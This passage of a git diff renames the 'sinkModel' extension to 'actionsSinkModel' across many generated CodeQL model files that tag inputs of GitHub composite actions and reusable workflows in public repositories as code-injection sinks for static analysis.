b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f44..5f75d4fd0cd2 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc485..d34a6a1a3885 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc5..b7c5f7e214c1 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68de..eead3b5ace31 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd4061..be7043cfdbfc 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a3..36bdef9ad9ae 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c8..3d66b07df9f1 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464e..2f8a3fbdfa6f 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e6..e1acb54c7247 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344f..0a51c7087996 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd2433..0ee56c05777d 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329fb..f17216cf1e8c 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd7..551010c6634d 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb4..bd64e336c171 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff8..7d5454518675 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b094..1ad4a2b824df 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f38..60381d41f16b 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115b..ac61ed797d52 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b152..7eed41f755ed 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc4..f977f6a5cce1 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed761..c4bacdc9c2c7 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe17..f4ee49207979 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f782746230..5fae95e5defb 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba01..4115d6c98f71 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492d..536b37131c17 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed50..54f72118d870 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658b..bed9ae53110e 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816f..7e9f4e14e857 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6deb..3a16fc74bb68 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298f..686f1013dd81 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812b..6a6cb61c1745 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f1..513cd4d76446 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c5..2855a6d4e01d 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27d..78a2cc4e0ced 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de3..8db73d2fc779 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e785..8b0deda070d9 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d695..3f7a7e7fda80 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5d..9746a1186913 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68beb..6208645b1b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3a..e66e7326701e 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff0..471ce3a672a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf1..1af30be9f358 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9ef..ee3d9d0a8eff 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445d..493594e3b81a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c8..a437581ba83a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184f..489e005cc0ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d747..3a0e723e9f70 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d1..893be8a27259 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", 